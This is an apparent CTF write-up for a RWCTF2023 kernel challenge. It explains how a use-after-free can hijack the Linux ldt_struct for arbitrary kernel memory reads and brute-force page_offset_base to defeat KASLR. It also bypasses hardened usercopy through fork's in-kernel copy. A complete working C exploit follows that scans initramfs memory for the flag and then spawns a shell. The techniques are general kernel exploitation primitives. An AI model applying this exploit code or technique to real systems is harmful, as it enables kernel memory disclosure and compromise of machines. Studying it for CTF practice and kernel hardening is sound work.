Searching for the Flag Directly in Memory¶

Initial RAM disk (initrd) provides the ability to load a RAM disk during the boot loader stage and mount it as the root filesystem, thereby running some user-space programs during this stage. Only after this stage is completed is the actual root filesystem mounted.

The initrd filesystem image is usually in gzip format. During the boot stage, the boot loader passes its path to the kernel. Since version 2.6, the cpio-formatted initramfs appeared, which can be expanded into a filesystem without mounting.

A key characteristic of initrd/initramfs is that all contents of the filesystem are read into memory. Most CTF kernel pwn challenges choose to use initrd directly as the root filesystem. Therefore, if we have the ability to search memory, we can directly search for the flag content in the memory space :)

Example: RWCTF2023 Experience Competition - Digging into kernel 3¶

Challenge Analysis¶

The challenge has already been analyzed previously, so the author will not repeat the analysis here :)

Exploitation: Reading initramfs Content Directly via ldt_struct¶

Since the challenge directly provides an unrestricted UAF, the exploitation methods are diverse :-D Here the author chooses to use ldt_struct to search for the flag directly in the memory space.

Step.I - Arbitrary Memory Read via ldt_struct¶

LDT stands for Local Descriptor Table, which stores the process's segment descriptors. The segment selector stored in the segment register is an index into the segment descriptor table. In the kernel, the structure associated with LDT is ldt_struct, defined as follows. The entries pointer points to a block of memory for the descriptor table, and nr_entries represents the number of descriptors in the LDT:

struct ldt_struct {
    /*
     * Xen requires page-aligned LDTs with special permissions.  This is
     * needed to prevent us from installing evil descriptors such as
     * call gates.  On native, we could merge the ldt_struct and LDT
     * allocations, but it's not worth trying to optimize.
     */
    struct desc_struct    *entries;
    unsigned int        nr_entries;

    /*
     * If PTI is in use, then the entries array is not mapped while we're
     * in user mode.  The whole array will be aliased at the addressed
     * given by ldt_slot_va(slot).  We use two slots so that we can allocate
     * and map, and enable a new LDT without invalidating the mapping
     * of an older, still-in-use LDT.
     *
     * slot will be -1 if this LDT doesn't have an alias mapping.
     */
    int            slot;
};

We mainly focus on how this structure can be used for exploitation. Linux provides a modify_ldt() system call to manipulate the current process's ldt_struct structure:

SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
        unsigned long , bytecount)
{
    int ret = -ENOSYS;

    switch (func) {
    case 0:
        ret = read_ldt(ptr, bytecount);
        break;
    case 1:
        ret = write_ldt(ptr, bytecount, 1);
        break;
    case 2:
        ret = read_default_ldt(ptr, bytecount);
        break;
    case 0x11:
        ret = write_ldt(ptr, bytecount, 0);
        break;
    }
    /*
     * The SYSCALL_DEFINE() macros give us an 'unsigned long'
     * return type, but tht ABI for sys_modify_ldt() expects
     * 'int'.  This cast gives us an int-sized value in %rax
     * for the return code.  The 'unsigned' is necessary so
     * the compiler does not try to sign-extend the negative
     * return codes into the high half of the register when
     * taking the value from int->long.
     */
    return (unsigned int)ret;
}

For write_ldt(), it ultimately calls alloc_ldt_struct() to allocate the ldt structure. Since it uses the generic allocation path, we can perform UAF on this structure :)

/* The caller must call finalize_ldt_struct on the result. LDT starts zeroed. */
static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
    struct ldt_struct *new_ldt;
    unsigned int alloc_size;

    if (num_entries > LDT_ENTRIES)
        return NULL;

    new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
//...

And read_ldt() simply reads the contents of the LDT table to user space. Since we have unrestricted UAF, we can modify ldt->entries to achieve arbitrary address read in kernel space:

static int read_ldt(void __user *ptr, unsigned long bytecount)
{
//...
    if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
        retval = -EFAULT;
        goto out_unlock;
    }
//...
out_unlock:
    up_read(&mm->context.ldt_usr_sem);
    return retval;
}

read_ldt() can also help us bypass KASLR. Here we leverage a feature of copy_to_user(): for invalid addresses, it does not cause a kernel panic, but only returns a non-zero error code. It is easy to see that we can modify ldt->entries multiple times and call modify_ldt() multiple times to brute-force the kernel's page_offset_base. If we successfully hit the correct address, modify_ldt will return a non-negative value.

However, due to the existence of hardened usercopy, we cannot directly read the contents of the kernel code section or objects in the linear mapping area whose size does not match, as this would cause a kernel panic.

Step.II - Bypassing Hardened Usercopy via fork¶

Although hardened usercopy exists for data copying between user space and kernel space, there is no similar protection mechanism for data copying within kernel space. Therefore, we can bypass hardened usercopy through certain methods.

Reading the Linux kernel source code, it is easy to observe that when a process calls fork(), the kernel copies the contents of the parent process's ldt->entries to the child process via memcpy():

/*
 * Called on fork from arch_dup_mmap(). Just copy the current LDT state,
 * the new task is not running, so nothing can be installed.
 */
int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
    //...

    memcpy(new_ldt->entries, old_mm->context.ldt->entries,
           new_ldt->nr_entries * LDT_ENTRY_SIZE);

       //...
}

This operation is entirely within the kernel, so it will not trigger the hardened usercopy check. We only need to set up the search address in the parent process and then spawn a child process to read the data using read_ldt().

EXPLOIT¶

The final exploit is as follows, which is also the solution the author used during the competition:

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <stdio.h>
#include <signal.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <ctype.h>
#include <stdint.h>

int dev_fd;

struct node {
    uint32_t idx;
    uint32_t size;
    void *buf;
};

void err_exit(char * msg)
{
    printf("[x] %s \n", msg);
    exit(EXIT_FAILURE);
}

void alloc(uint32_t idx, uint32_t size, void *buf)
{
    struct node n = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    ioctl(dev_fd, 0xDEADBEEF, &n);
}

void del(uint32_t idx)
{
    struct node n = {
        .idx = idx,
    };

    ioctl(dev_fd, 0xC0DECAFE, &n);
}

int main(int argc, char **argv, char **envp)
{
    struct user_desc desc;
    uint64_t page_offset_base = 0xffff888000000000;
    uint64_t secondary_startup_64;
    uint64_t kernel_base = 0xffffffff81000000, kernel_offset;
    uint64_t search_addr, flag_addr = -1;
    uint64_t temp;
    uint64_t ldt_buf[0x10];
    char *buf;
    char flag[0x100];
    int pipe_fd[2];
    int retval;
    cpu_set_t cpu_set;

    /* bind to CPU core 0 */
    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(0, sizeof(cpu_set), &cpu_set);

    dev_fd = open("/dev/rwctf", O_RDONLY);
    if (dev_fd < 0) {
        err_exit("FAILED to open the /dev/rwctf file!");
    }

    /* init descriptor info */
    desc.base_addr = 0xff0000;
    desc.entry_number = 0x8000 / 8;
    desc.limit = 0;
    desc.seg_32bit = 0;
    desc.contents = 0;
    desc.limit_in_pages = 0;
    desc.lm = 0;
    desc.read_exec_only = 0;
    desc.seg_not_present = 0;
    desc.useable = 0;

    alloc(0, 16, "arttnba3rat3bant");
    del(0);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

    /* leak kernel direct mapping area by modify_ldt() */
    while(1) {
        ldt_buf[0] = page_offset_base;
        ldt_buf[1] = 0x8000 / 8;
        del(0);
        alloc(0, 16, ldt_buf);
        retval = syscall(SYS_modify_ldt, 0, &temp, 8);
        if (retval > 0) {
            printf("[-] read data: 0x%lx\n", temp);
            break;
        }
        else if (retval == 0) {
            err_exit("no mm->context.ldt!");
        }
        page_offset_base += 0x1000000;
    }
    printf("[+] Found page_offset_base: 0x%lx\n", page_offset_base);

    /* leak kernel base from direct mappinig area by modify_ldt() */
    ldt_buf[0] = page_offset_base + 0x9d000;
    ldt_buf[1] = 0x8000 / 8;
    del(0);
    alloc(0, 16, ldt_buf);
    syscall(SYS_modify_ldt, 0, &secondary_startup_64, 8);
    kernel_offset = secondary_startup_64 - 0xffffffff81000060;
    kernel_base += kernel_offset;
    printf("[*] Get  secondary_startup_64: 0x%lx\n", secondary_startup_64);
    printf("[+] kernel_base: 0x%lx\n", kernel_base);
    printf("[+] kernel_offset: 0x%lx\n", kernel_offset);

    /* search for flag in kernel space */
    search_addr = page_offset_base;
    pipe(pipe_fd);
    buf = (char*) mmap(NULL, 0x8000, 
                        PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 
                        0, 0);
    while(1) {
        ldt_buf[0] = search_addr;
        ldt_buf[1] = 0x8000 / 8;
        del(0);
        alloc(0, 16, ldt_buf);
        int ret = fork();
        if (!ret) { // child
            char *result_addr;

            syscall(SYS_modify_ldt, 0, buf, 0x8000);
            result_addr = memmem(buf, 0x8000, "rwctf{", 6);
            if (result_addr) {
                for (int i = 0; i < 0x100; i++) {
                    if (result_addr[i] == '}') {
                        flag_addr = search_addr + (uint64_t)(result_addr - buf);
                        printf("[+] Found flag at addr: 0x%lx\n", flag_addr);
                    }
                }
            }
            write(pipe_fd[1], &flag_addr, 8);
            exit(0);
        }
        wait(NULL);
        read(pipe_fd[0], &flag_addr, 8);
        if (flag_addr != -1) {
            break;
        }
        search_addr += 0x8000;
    }

    /* read flag */
    memset(flag, 0, sizeof(flag));
    ldt_buf[0] = flag_addr;
    ldt_buf[1] = 0x8000 / 8;
    del(0);
    alloc(0, 16, ldt_buf);
    syscall(SYS_modify_ldt, 0, flag, 0x100);
    printf("[+] flag: %s\n", flag);

    system("/bin/sh");

    return 0;
}